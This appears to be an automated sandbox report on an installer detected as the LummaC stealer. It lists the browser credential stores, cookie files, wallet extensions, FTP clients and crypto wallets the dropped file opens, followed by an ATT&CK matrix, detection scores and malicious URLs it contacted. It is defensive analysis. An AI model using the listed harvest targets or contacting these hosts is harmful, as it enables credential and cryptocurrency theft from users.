Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\FTPGetter	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\FTPInfo	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\FTPbox	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\FTPRush	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\ProgramData\SiteDesigner\3D-FTP	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Ledger Live	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Binance	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB	Jump to behavior

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents\WKXEWIOTXI	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	Directory queried: C:\Users\user\Documents\DTBZGIOOSO	Jump to behavior

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	13 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	12 Process Injection	1 Obfuscated Files or Information	11 Input Capture	25 System Information Discovery	Remote Desktop Protocol	31 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Command and Scripting Interpreter	Logon Script (Windows)	Logon Script (Windows)	1 DLL Side-Loading	Security Account Manager	321 Security Software Discovery	SMB/Windows Admin Shares	11 Input Capture	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	111 Masquerading	NTDS	3 Process Discovery	Distributed Component Object Model	1 Clipboard Data	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	221 Virtualization/Sandbox Evasion	LSA Secrets	221 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Process Injection	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	2 System Owner/User Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
installer_1.05_36.5.exe	8%	ReversingLabs
installer_1.05_36.5.exe	11%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\373155\Pens.com	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.exe	14%	ReversingLabs	Win32.Trojan.Hulk
C:\Users\user\AppData\Local\Temp\is-7J1HK.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-7J1HK.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-L8FKG.tmp\_isetup\_isdecmp.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-L8FKG.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-ODTPG.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-R75UJ.tmp\E4E2I2U2N6C8Y1TQOD0QFN3V76HOR.tmp	3%	ReversingLabs
C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)	8%	ReversingLabs
C:\Users\user\AppData\Roaming\ColorStreamLib\is-N6HUM.tmp	8%	ReversingLabs

Source	Detection	Scanner	Label
https://dfgh.online/invoker.php?compName=user-PCT	0%	Avira URL Cloud	safe
https://klipvumisui.shop/int_clp_sha.txt	100%	Avira URL Cloud	malware
https://dfgh.online/invoker.php?compname=	0%	Avira URL Cloud	safe
https://imbibelubmbe.click/api	0%	Avira URL Cloud	safe
http://www.microsoft.0	0%	Avira URL Cloud	safe
https://dfgh.online	0%	Avira URL Cloud	safe
http://www.autohotkey.comCould	0%	Avira URL Cloud	safe
http://crl.usertr	0%	Avira URL Cloud	safe
https://...onlin	0%	Avira URL Cloud	safe
http://crl.usertru	0%	Avira URL Cloud	safe
http://crl.ms/Mi	0%	Avira URL Cloud	safe
https://dfgh.online/invoker.php?compName=user-PC	0%	Avira URL Cloud	safe
http://michaeluno.jp/	0%	Avira URL Cloud	safe

Domains and IPs

